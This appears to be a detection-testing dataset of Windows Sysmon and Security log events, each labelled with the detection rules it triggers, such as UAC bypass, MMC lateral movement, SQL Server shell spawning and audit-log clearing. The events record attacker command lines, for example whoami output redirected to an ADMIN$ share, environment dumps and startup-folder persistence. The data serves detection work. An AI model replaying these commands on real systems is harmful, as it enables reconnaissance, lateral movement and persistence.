user","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ParentProcessId":788,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010B6A2AC00","ProcessId":712,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.162"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1047,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.192601Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\windows\\system32\\notepad.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311354,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:17.591137Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311355,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:17.591169Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:31.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311361,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:31.218022Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"cmd.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\b","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311367,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:45.590589Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"ba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311368,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:45.590736Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"powershell.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\c","UtcTime":"2020-07-09 22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311375,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:01:03.900433Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"cba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311376,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:01:03.902259Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"eventvwr\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\d","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311387,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:06:20.185045Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"dcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311388,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:06:20.185107Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\\\\tsclient\\c\\temp\\stack\\a.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\e","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311413,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-10T10:20:37.672486Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"edcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311414,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-10T10:20:37.672499Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Shells Spawn by SQL Server"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c set > c:\\users\\\\public\\netstat.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CE3B-5DBE-0000-00201ED50100","LogonId":"0x1d51e","ParentCommandLine":"\"c:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS","ParentImage":"C:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe","ParentProcessGuid":"747F3D96-CE42-5DBE-0000-0010EE430200","ParentProcessId":3936,"ProcessGuid":"747F3D96-DB7C-5DBE-0000-0010CF6B9502","ProcessId":5004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\sqlsvc","UtcTime":"2019-11-03 13:51:56.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":56509,"Execution_attributes":{"ProcessID":3180,"ThreadID":4224},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-11-03T13:51:58.263043Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC20 Lateral Movement"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Management Console","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1","Image":"C:\\Windows\\System32\\mmc.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-001087700000","ParentProcessId":612,"ProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ProcessId":3572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:11.856"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9832,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:11.856089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B180-5CC8-0000-00102BB71E00","ProcessId":1504,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:12.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9833,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:12.449839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-0010ADBF1E00","ProcessId":3372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9838,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.449839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ProcessId":1256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.512"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9839,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.512339Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ParentProcessId":1256,"ProcessGuid":"365ABB72-B181-5CC8-0000-00108DC71E00","ProcessId":692,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.527"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9840,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.543589Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC04.example.corp","Correlation":null,"EventID":1102,"EventRecordID":6272,"Execution_attributes":{"ProcessID":792,"ThreadID":3120},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:26:42.116688Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"PC04","SubjectLogonId":"0x128a9","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","DLL Load via LSASS"],"event":{"Event":{"EventData":{"Details":"\\\\172.16.66.254\\shared\\lsadb.dll","EventType":"SetValue","Image":"C:\\WINDOWS\\system32\\svchost.exe","ProcessGuid":"6A3C3EF2-E699-5F7C-0000-001048EF0000","ProcessId":404,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","UtcTime":"2020-10-06 22:11:17.814"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":13,"EventRecordID":345994,"Execution_attributes":{"ProcessID":10204,"ThreadID":2096},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-06T22:11:17.814931Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Hijack Legit RDP Session to Move Laterally","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-14 13:55:57.243","Image":"C:\\Windows\\system32\\mstsc.exe","ProcessGuid":"ECAD0485-C903-5CDA-0000-0010340F1000","ProcessId":2580,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cmd.exe","UtcTime":"2019-05-14 14:04:05.696"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":31145,"Execution_attributes":{"ProcessID":1580,"ThreadID":2324},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-14T14:04:05.697491Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\ProgramData\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-3991-5D0B-0000-002029350100","LogonId":"0x13529","ParentCommandLine":"\"cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-3ED4-5D0B-0000-0010B2871A00","ParentProcessId":1440,"ProcessGuid":"365ABB72-3ED8-5D0B-0000-0010398F1A00","ProcessId":1476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-20 